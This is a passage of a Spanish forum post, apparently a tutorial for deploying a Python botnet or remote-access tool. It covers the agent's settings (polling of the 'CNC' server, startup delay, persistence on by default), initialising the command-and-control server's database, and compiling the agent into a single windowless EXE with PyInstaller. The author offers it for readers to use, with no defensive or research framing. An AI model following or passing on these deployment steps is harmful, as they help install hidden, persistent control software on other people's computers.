-Idle_time = tiempo de inactividad antes de entrar en el modo de espera.
-REQUEST_INTERVAL = intervalo entre cada consulta a la CNC cuando se activa
-PAUSE_AT_START = tiempo de espera antes de contactar con el servidor cuando se inicie (en segundos)
-AUTO_PERSIST = por defecto el agente es persistente


Una vez todo en orden pasaremos a instalar el server, primero debemos crear la base de datos SQLite

cd server
python db_init.py 

Si no esta instalado el paquete cherrypy deberemos instalarlo

pip install cherrypy

Bien, a continuacion iniciaremos el server, python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Por defecto el servidor escucha en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Por ultimo utlizaremos PyInstaller para compilar el agente en un unico archivo EXE:

cd agent
PyInstaller --onefile --noconsole agent.py

Recuerden que deberemos iniciar el server y la bbdd antes de lanzar el script.


Mediante el fichero You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login conseguiremos el bot, yo lo que he hecho ha sido ejecutarlo desde la consola

---

Bueno hasta aqui Art Attack espero que os sirva a alguno

Un saludo biacheees